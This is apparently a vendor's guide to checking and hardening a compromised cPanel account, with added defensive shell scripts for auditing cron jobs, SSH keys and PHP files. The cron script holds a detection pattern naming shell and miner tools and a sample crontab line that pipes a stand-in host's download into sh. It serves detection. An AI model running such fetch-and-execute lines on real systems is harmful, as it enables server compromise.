How to fix a hacked cPanel account
cPanel is a popular hosting panel, and without proper security measures and configuration it can be vulnerable to attacks. This guide will help you assess whether your cPanel account is compromised and shows how to further secure it.
How to know if my cPanel account is hacked
Run a scan in WHM Security Advisor
If you use WHM, run a scan using Security Advisor to identify server level security issues such as outdated software, poor password strength, misconfigurations etc. This interface runs a security scan on your server, and it advises you about how to resolve any security issues that it finds.
Log into WHM as the root user
Type advisor in the search field
Click the Security Advisor link under Security Center
The cPanel Security Advisor will then scan your server and provide a list of security suggestions or warnings
To re-scan the site, click the Scan Again button
Security suggestions will vary from red for important issues, yellow for medium security issues, blue for informational warnings, and green if it passes security checks.
Check for unknown cPanel User Accounts
If the server is compromised, an attacker may add additional users to your cPanel account so that they can keep accessing your server.
Open Preferences > User Manager in your cPanel account
Go through the list of users to identify any unknown accounts which were not created by you
Once you've verified that the accounts were not created by anyone in your team, delete the unknown cPanel accounts
Use the Delete the User’s Home Directory option with extreme caution. If you select it, the user’s data, including the user’s FTP folder, will be removed and cannot be recovered. If the FTP account that you delete can access the public_html directory, then checking this option will also remove the public_html directory and all of its contents, which includes all your website files. This will break your website.
Check for Malicious Cron Jobs
To evade security scanners and easily re-infect your server, an attacker may create malicious cron jobs on your server. The malicious code runs periodically to re-infect the site, mine cryptocurrency or perform other dangerous actions.
Open Advanced > Cron Jobs in your cPanel account
Check for any unknown or suspicious Cron Jobs which were not created by you
Once you've verified that the Cron Job was not created by anyone in your team, delete the Cron Job
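The cron review above is a manual check in the cPanel interface. As an added example that is not part of the original article, the script below applies the same idea to the crontab files themselves: it flags entries that use patterns often seen in malicious persistence (download-and-execute pipes, hidden files in world-writable directories, miner names) so a reviewer can look at those first. The crontab it scans is constructed for the example, and the pattern list is a heuristic, not a definitive signature set.

```sh
#!/bin/sh
# Added example, not from the original article: a heuristic audit of crontab
# files for entries that deserve a manual look. On a cPanel server the per-user
# crontabs live in /var/spool/cron/<username> (readable as root), or use
# `crontab -l -u <username>`. The sample crontab below is constructed.

# Heuristics, not proof of compromise: a legitimate job can match and a
# malicious one can avoid matching, so review every hit with the account owner.
SUSPICIOUS_PATTERNS='(curl|wget)[^|]*[|][[:space:]]*(ba)?sh|base64[[:space:]]+(-d|--decode)|/dev/shm/|/tmp/\.|/var/tmp/\.|xmrig|minerd|stratum.tcp|nc[[:space:]]+-e|python[0-9.]*[[:space:]]+-c'

# flag_cron_entries FILE: print every non-comment, non-blank crontab line that
# matches one of the patterns above (prints nothing when the crontab looks clean).
flag_cron_entries() {
    grep -v -E '^[[:space:]]*(#|$)' "$1" | grep -i -E "$SUSPICIOUS_PATTERNS" || true
}

# count_flagged FILE: number of flagged entries, always printed (0 when clean).
count_flagged() {
    n=$(flag_cron_entries "$1" | grep -c .) || true
    printf '%s\n' "$n"
}

# audit_cron_dir DIR: treat DIR like /var/spool/cron (one file per user), print
# "REVIEW <user>: <entry>" for each hit and finish with the total hit count.
audit_cron_dir() {
    hits=0
    for file in "$1"/*; do
        [ -f "$file" ] || continue
        user=$(basename "$file")
        n=$(count_flagged "$file")
        if [ "$n" -gt 0 ]; then
            flag_cron_entries "$file" | sed "s|^|REVIEW $user: |"
            hits=$((hits + n))
        fi
    done
    printf '%s\n' "$hits"
}

# Constructed sample crontab (invented for this example; example.invalid is a
# reserved domain that never resolves). Two of the five entries should be flagged.
write_sample_crontab() {
    cat > "$1" <<'EOF'
MAILTO=""
# nightly backup, created by the site owner
0 3 * * * /usr/local/bin/backup.sh >/dev/null 2>&1
*/5 * * * * curl -s http://example.invalid/x.txt | sh
@reboot /dev/shm/.sysupdate
30 2 * * 0 /usr/bin/php /home/siteuser/public_html/cron.php
EOF
}

# Stand-alone demo: build a fake spool directory with one user and audit it.
spool=$(mktemp -d)
write_sample_crontab "$spool/siteuser"
audit_cron_dir "$spool"
rm -rf "$spool"
```

On a real server, run it as root against /var/spool/cron (or a copy of it), and treat every REVIEW line as a question for the account owner rather than as a verdict; the entries the page asks you to delete are the ones nobody on your team can account for.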
Check for unknown SSH accounts
Similar to adding unknown cPanel user accounts, a hacker may create
Open Security > SSH Access in your cPanel account
Click on Manage SSH Keys to see the list of SSH keys created for the account
Check for any unknown or unauthorized SSH keys which were not created by you
Once you've verified that the SSH keys were not created by anyone in your team, delete the SSH keys
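As an added example that is not part of the article, the script below compares an account's authorized_keys file with the public keys your team has on record and reports the unknown ones, together with a SHA-256 fingerprint you can cross-check against ssh-keygen. The file paths, the allowlist format (one "type blob comment" line per approved key) and the all-zero sample key blobs are assumptions made for the example.

```sh
#!/bin/sh
# Added example, not from the original article: compare the keys in an
# authorized_keys file with the public keys your team has on record and report
# the ones that are unknown. On a cPanel server the file is
# /home/<username>/.ssh/authorized_keys. Both input files below are constructed
# and the key blobs are all-zero placeholders, not real keys.

KEY_TYPES='ssh-ed25519|ssh-rsa|ecdsa-sha2-nistp[0-9]+|sk-ssh-ed25519@openssh.com|sk-ecdsa-sha2-nistp256@openssh.com'

# key_fingerprint BLOB: hex SHA-256 of the decoded key blob. This is the same
# digest that `ssh-keygen -lf FILE -E sha256` shows, only hex-encoded instead
# of base64, so it can be cross-checked against that tool's output.
key_fingerprint() {
    printf '%s' "$1" | base64 -d 2>/dev/null | sha256sum | cut -d' ' -f1
}

# unknown_keys AUTHORIZED_KEYS ALLOWLIST: print "<status> <type> <fingerprint>
# <comment>" for each key whose blob is not in ALLOWLIST. Keys that carry an
# options prefix (command=, from=, ...) are reported even when the key itself
# is known, because the options decide what that key may do. Assumes the key
# type token appears once per line (a comment containing it would confuse it).
unknown_keys() {
    keys_file=$1
    allow_file=$2
    grep -v -E '^[[:space:]]*(#|$)' "$keys_file" | while IFS= read -r line; do
        first=${line%% *}
        if printf '%s' "$first" | grep -q -E "^($KEY_TYPES)\$"; then
            status=""
        else
            status="HAS-OPTIONS"
            # drop the options field by re-anchoring on the key type token
            line=$(printf '%s' "$line" | sed -E "s/^.*[[:space:]](($KEY_TYPES)[[:space:]])/\\1/")
        fi
        set -- $line
        [ $# -ge 2 ] || { printf 'MALFORMED %s\n' "$line"; continue; }
        type=$1; blob=$2; shift 2; comment=$*
        if grep -q -F -- "$blob" "$allow_file"; then
            [ -n "$status" ] || continue   # known key without options: fine
        else
            status="UNKNOWN${status:+,$status}"
        fi
        printf '%s %s %s %s\n' "$status" "$type" "$(key_fingerprint "$blob")" "${comment:-<no comment>}"
    done
}

# count_unknown_keys AUTHORIZED_KEYS ALLOWLIST: number of reported lines.
count_unknown_keys() {
    n=$(unknown_keys "$1" "$2" | grep -c .) || true
    printf '%s\n' "$n"
}

# Constructed inputs. The blobs are 68 base64 characters like a real ed25519
# key, but with all-zero payloads; they are placeholders, not usable keys.
write_sample_files() {
    cat > "$1" <<'EOF'
# public keys approved for the siteuser account (team inventory)
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA alice@laptop
EOF
    cat > "$2" <<'EOF'
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA alice@laptop
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
command="/usr/bin/rsync --server --sender" ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC backup-host
EOF
}

# Stand-alone demo on the constructed files: the approved key is silent, the
# keyless-comment key is UNKNOWN, the rsync key is UNKNOWN,HAS-OPTIONS.
d=$(mktemp -d)
write_sample_files "$d/allowlist" "$d/authorized_keys"
unknown_keys "$d/authorized_keys" "$d/allowlist"
rm -rf "$d"
```

Keys reported as UNKNOWN are the candidates for deletion in Manage SSH Keys; keys that are known but carry options still deserve a look, since a forced command or a from= restriction changes what the key can do without changing the key itself.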
Check for unknown API Tokens
Similar to creating an unknown user, hackers may also create an API token for an existing user to login and access the cPanel account.
Open Security > Manage API Tokens in your cPanel account
Check for any unknown or unauthorized API tokens which were not created by you
Once you've verified that the API tokens were not created by anyone in your team, delete the API token
How to harden your cPanel account
Change Password of all cPanel & WHM users
If your server is not hardened, hackers may exploit vulnerabilities to compromise the password of your cPanel account and log in. As a precaution, change the password of ALL cPanel users.
You should immediately change the password of the root user account
Login to WHM
Click the Account Function option
Click on the button Force Password Change
This opens a page listing all available users; select every account or only the ones you need, then click Submit
Force Password Change is now enabled for the selected users. The next time a user logs in to cPanel, they are shown a message that the administrator has requested that they change their password.
Change password of all FTP/SFTP/SSH accounts
(s)FTP and SSH allow secure file transfer and remote logins to the server over the internet. If an attacker gets access to one of these accounts, they can view, edit or delete all website files in the cPanel account. Change the credentials periodically to prevent misuse.
Open Files > FTP Accounts in your cPanel account
Select Change Password in the Actions column beside the FTP account that needs a password reset
Type in your new password and click Change Password
Enable two-factor authentication (2FA)
To prevent misuse of your account, enable two-factor authentication (2FA) for cPanel. After you enter your password, you must also enter a security code. Even if your account password is compromised, an attacker cannot log in to cPanel without the 2FA code, which is available only on your smartphone.
Enable Two-Factor authentication in WHM
Login to WHM as the root user
Navigate to Home > Security Center > Two-Factor Authentication
Ensure that the toggle button shows that Two-Factor Authentication is enabled
Enable Two-Factor Authentication for a cPanel User
Login to the cPanel account
Open Security > Two Factor Authentication in your cPanel account
Follow the steps on the page to enable Two Factor authentication
Run a malware scan
It is important to scan all website files and the database for malicious files a hacker may have created or modified. We will run two types of scans:
Scan website files using the Malware Scanner in the Astra Website Protection plugin
Scan server files using Virus Scanner in cPanel
Install ClamAV Scanner plugin in WHM
Login to WHM as the root user
Navigate to Home > cPanel > Manage Plugins
Install the ClamAV Scanner plugin
Scan the website using ClamAV in cPanel
Open Advanced > Virus Scanner in your cPanel account
Select Scan Entire Home Directory and start a scan
If the scanner flags any files, review each file and delete the malicious files
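ClamAV covers signature-based detection. As an added example that is not part of the article, the script below narrows the manual review that follows a scan: it lists recently modified PHP files, PHP files in directories that should only hold static content, and files containing common obfuscation markers. The directory layout, the marker list and the sample site it builds are constructed for the example.

```sh
#!/bin/sh
# Added example, not from the original article: a quick file-system triage to
# run alongside the ClamAV scan, listing the files a reviewer should look at
# first. It does not replace a signature scan; it only narrows the review.
# On a cPanel server point it at /home/<username>/public_html. The sample
# tree built below is constructed.

# Markers that often appear in obfuscated PHP. Legitimate plugins use some of
# these too, so a hit means "read this file", not "delete this file".
OBFUSCATION_MARKERS='eval[[:space:]]*\(|base64_decode[[:space:]]*\(|gzinflate[[:space:]]*\(|str_rot13[[:space:]]*\(|create_function[[:space:]]*\('

# recent_php_files DIR DAYS: PHP files modified within the last DAYS days.
# Files dropped by an attacker are usually newer than the rest of the site; a
# legitimate update shows up here too, so compare the list with your change log.
recent_php_files() {
    find "$1" -type f -name '*.php' -mtime "-$2" | sort
}

# php_in_upload_dirs DIR: executable PHP under directories that should only
# hold static content (uploads, cache, images).
php_in_upload_dirs() {
    find "$1" -type f \( -name '*.php' -o -name '*.phtml' -o -name '*.php[0-9]' \) \
        \( -path '*/uploads/*' -o -path '*/cache/*' -o -path '*/images/*' \) | sort
}

# obfuscation_markers DIR: PHP files containing any of the markers above.
obfuscation_markers() {
    find "$1" -type f -name '*.php' -exec grep -l -E "$OBFUSCATION_MARKERS" {} + 2>/dev/null | sort
}

# count_lines: read a list on stdin and print how many entries it has (0 if none).
count_lines() {
    n=$(grep -c .) || true
    printf '%s\n' "$n"
}

# triage DIR DAYS: one labelled line per finding from the three checks above.
triage() {
    recent_php_files "$1" "$2" | sed 's/^/RECENT  /'
    php_in_upload_dirs "$1"     | sed 's/^/UPLOAD  /'
    obfuscation_markers "$1"    | sed 's/^/OBFUSC  /'
}

# Constructed sample site: one old clean file, one fresh clean theme file and
# one fresh file under uploads/ carrying an inert eval(base64_decode(...)) marker.
build_sample_site() {
    root=$1/public_html
    mkdir -p "$root/wp-content/themes/site" "$root/wp-content/uploads/2022/08"
    printf '<?php echo "hello"; ?>\n' > "$root/index.php"
    touch -t 202001010000 "$root/index.php"          # give it an old mtime
    printf '<?php function site_setup() {} ?>\n' > "$root/wp-content/themes/site/functions.php"
    printf '<?php /* constructed marker, not a working backdoor */ eval(base64_decode("AAAA")); ?>\n' \
        > "$root/wp-content/uploads/2022/08/img.php"
    printf '%s\n' "$root"
}

# Stand-alone demo: build the sample site and triage it with a 7-day window.
tmp=$(mktemp -d)
site=$(build_sample_site "$tmp")
triage "$site" 7
rm -rf "$tmp"
```

A file that appears in more than one list (fresh, under uploads/, and obfuscated) is the one to open first; a file that only appears as RECENT may simply be part of a plugin update, which is why the page asks you to review each flagged file rather than delete on sight.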
Get a Pentest of the hosted applications
If the applications running on the server have vulnerabilities, hackers may exploit them to upload files to your server and gain access to the cPanel account. Get a vulnerability scan and pentest of all applications running on the server to identify such vulnerabilities.
Enable a Web Application Firewall (WAF)
To protect your server and applications running on it, it is important to enable a Web Application Firewall (WAF) to stay protected against attacks such as SQL Injection (SQLi), Cross-site Scripting (XSS) etc.
Install Astra Website Protection plugin for each website running on your cPanel account
For non-PHP websites, enable ModSecurity on the server
Enable Brute-force protection
To protect your server from brute-force attacks, configure cPHulk. It will protect the cPanel, WHM, FTP, SSH & mail services.
Run only 1 website per cPanel account
So that a malware infection does not spread, run only one website per cPanel account. Because all sites in an account share the same file permissions and ownership, if one site gets infected it can easily infect the other websites installed on the same cPanel account. Create additional cPanel accounts via WHM, or speak to your hosting provider.
Regularly update cPanel & WHM on all of your servers
To benefit from the latest security patches, we strongly recommend that you regularly update cPanel & WHM on all of your servers.
Updated on: 20/08/2022